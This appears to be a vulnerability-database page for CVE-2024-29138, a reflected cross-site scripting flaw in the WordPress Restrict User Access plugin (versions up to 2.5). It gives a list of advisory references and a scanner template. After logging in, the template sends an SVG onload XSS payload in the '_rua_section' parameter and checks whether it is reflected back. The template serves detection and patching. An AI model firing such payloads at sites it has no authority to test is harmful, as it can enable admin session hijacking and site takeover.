| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2024-29138 | 19 Mar 202415:27 | – | circl | |
| WordPress Plugin Restrict User Access Cross-Site Scripting Vulnerability | 19 Mar 202400:00 | – | cnnvd | |
| CVE-2024-29138 | 19 Mar 202413:40 | – | cve | |
| CVE-2024-29138 WordPress Restrict User Access plugin <= 2.5 - Reflected Cross Site Scripting (XSS) vulnerability | 19 Mar 202413:40 | – | cvelist | |
| EUVD-2024-26174 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-29138 | 19 Mar 202414:15 | – | nvd | |
| CVE-2024-29138 | 19 Mar 202414:15 | – | osv | |
| WordPress Restrict User Access – Membership Plugin with Force Plugin <= 2.5 is vulnerable to Cross Site Scripting (XSS) | 18 Mar 202400:00 | – | patchstack | |
| PT-2024-22757 | 19 Mar 202400:00 | – | ptsecurity | |
| CVE-2024-29138 | 5 Feb 202508:13 | – | redhatcve |
id: CVE-2024-29138
info:
name: WordPress Restrict User Access <= 2.5 - Cross-Site Scripting
author: Shivam Kamboj
severity: medium
description: |
WordPress Restrict User Access – Membership Plugin with Force versions before 2.6 is vulnerable to Reflected Cross-Site Scripting via the '_rua_section' parameter in the admin level edit page.
impact: |
Attackers can execute arbitrary scripts in authenticated admin browsers, potentially leading to session hijacking, privilege escalation, WordPress admin account takeover, malicious plugin installation, and website defacement.
remediation: |
Update Restrict User Access plugin to version 2.6 or later.
reference:
- https://patchstack.com/database/wordpress/plugin/restrict-user-access/vulnerability/wordpress-restrict-user-access-plugin-2-5-reflected-cross-site-scripting-xss-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2024-29138
- https://wordpress.org/plugins/restrict-user-access/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-29138
epss-score: 0.00622
epss-percentile: 0.45452
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
fofa-query: body="/plugins/restrict-user-access/"
tags: cve,cve2024,wordpress,wp,wp-plugin,xss,authenticated,vkev
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, 'wordpress_logged_in')
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin.php?page=wprua-level&action=edit HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
level_id=1&_rua_section="><svg onload=alert(document.domain)>
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "\"><svg onload=alert(document.domain)>","restrict-user-access")'
condition: and
# digest: 4a0a0047304502204f9c92b0fa00a0611ccc0fdcaaa9eefbc753814cd958caf84102c0227bbbed03022100f887d4e50ddc977fae5f53bce429d2b2dbd5f0af7aa2d0fc09c08039f4e46f38:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation